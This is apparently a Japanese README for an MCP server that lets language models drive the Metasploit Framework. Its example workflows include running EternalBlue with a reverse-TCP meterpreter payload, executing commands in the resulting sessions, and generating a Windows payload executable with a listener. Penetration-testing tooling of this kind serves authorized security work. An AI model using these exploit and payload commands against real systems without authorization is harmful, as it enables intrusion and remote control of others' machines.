Metasploit MCP サーバー

Metasploit Framework 統合用のモデル コンテキスト プロトコル (MCP) サーバー。

https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1

説明

このMCPサーバーは、Claudeのような大規模言語モデルとMetasploit Framework侵入テストプラットフォーム間の橋渡しを提供します。AIアシスタントが標準化されたツールを通じてMetasploitの機能に動的にアクセスし、制御することを可能にし、複雑なセキュリティテストワークフローへの自然言語インターフェースを実現します。

特徴

モジュール情報

• list_exploits : 利用可能なMetasploitエクスプロイトモジュールを検索して一覧表示する

• list_payloads : オプションのプラットフォームとアーキテクチャのフィルタリングを使用して、利用可能な Metasploit ペイロード モジュールを検索して一覧表示します。

エクスプロイトワークフロー

• run_exploit : 最初にチェックを実行するオプションを使用して、ターゲットに対してエクスプロイトを設定して実行する

• run_auxiliary_module : カスタムオプションで任意のMetasploit補助モジュールを実行する

• run_post_module : 既存のセッションに対してポストエクスプロイトモジュールを実行する

ペイロード生成

• generate_payload : Metasploit RPC を使用してペイロード ファイルを生成する (ファイルをローカルに保存する)

セッション管理

• list_active_sessions : 現在のMetasploitセッションを詳細情報とともに表示する

• send_session_command : アクティブなシェルまたはMeterpreterセッションでコマンドを実行する

• terminate_session : アクティブなセッションを強制的に終了する

ハンドラー管理

• list_listeners : すべてのアクティブなハンドラーとバックグラウンドジョブを表示します

• start_listener : 接続を受信するための新しいマルチ/ハンドラを作成する

• stop_job : 実行中のジョブまたはハンドラーを終了する

前提条件

• Metasploit Frameworkがインストールされ、msfrpcdが実行中

• Python 3.10以上

• 必要な Python パッケージ (requirements.txt を参照)

インストール

1. このリポジトリをクローンする

2. 依存関係をインストールします:

   pip install -r requirements.txt

3. 環境変数を設定します（オプション）：

   MSF_PASSWORD=yourpassword MSF_SERVER=127.0.0.1 MSF_PORT=55553 MSF_SSL=false PAYLOAD_SAVE_DIR=/path/to/save/payloads # Optional: Where to save generated payloads

使用法

Metasploit RPC サービスを開始します。

交通手段

サーバーは 2 つの転送方法をサポートしています。

• HTTP/SSE (サーバー送信イベント) : ほとんどの MCP クライアントとの相互運用性を実現するデフォルト モード

• STDIO (標準入出力) : Claude Desktop や同様の直接パイプ接続で使用される

--transportフラグを使用して、トランスポート モードを明示的に選択できます。

HTTP モードの追加オプション:

クロードデスクトップ統合

Claude Desktop 統合の場合は、 claude_desktop_config.jsonを構成します。

その他のMCPクライアント

HTTP/SSE を使用するその他の MCP クライアントの場合:

1. HTTP モードでサーバーを起動します。

   python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085

2. MCP クライアントを次の接続先に設定します:

   • SSEエンドポイント: http://your-server-ip:8085/sse

セキュリティに関する考慮事項

⚠️重要なセキュリティ警告:

このツールは、強力なエクスプロイト機能を含むMetasploit Frameworkの機能に直接アクセスできるようにします。セキュリティテストを実行するための明示的な権限が付与された環境でのみ、責任を持ってご使用ください。

• 実行前に必ずすべてのコマンドを検証して確認してください

• 隔離されたテスト環境または適切な承認を得てのみ実行してください

• エクスプロイト後のコマンドは、システムに重大な変更をもたらす可能性があることに注意してください。

ワークフローの例

基本的な搾取

1. 利用可能なエクスプロイトの一覧: list_exploits("ms17_010")

2. エクスプロイトを選択して実行します: run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})

3. セッションの一覧表示: list_active_sessions()

4. コマンドを実行: send_session_command(1, "whoami")

搾取後

1. 投稿モジュールを実行します: run_post_module("windows/gather/enum_logged_on_users", 1)

2. カスタムコマンドを送信します: send_session_command(1, "sysinfo")

3. 完了したら終了する: terminate_session(1)

ハンドラー管理

1. リスナーを開始します: start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)

2. アクティブなハンドラーを一覧表示する: list_listeners()

3. ペイロードを生成します: generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})

4. ハンドラを停止する: stop_job(1)

設定オプション

ペイロード保存ディレクトリ

デフォルトでは、 generate_payloadで生成されたペイロードは、ホームフォルダ内のpayloadsディレクトリ（ ~/payloadsまたはC:\Users\YourUsername\payloads ）に保存されます。この保存場所は、 PAYLOAD_SAVE_DIR環境変数を設定することでカスタマイズできます。

環境変数の設定:

• Windows (PowerShell) :

  $env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"

• Windows (コマンドプロンプト) :

  set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads

• Linux/macOS :

  export PAYLOAD_SAVE_DIR=/custom/path/to/payloads

• Claude Desktop の設定:

  "env": { "MSF_PASSWORD": "yourpassword", "PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads" // Only add if you want to override the default }

**注:**カスタムパスを指定する場合は、そのパスが存在するか、アプリケーションに作成権限があることを確認してください。パスが無効な場合、ペイロードの生成に失敗する可能性があります。

ライセンス

アパッチ 2.0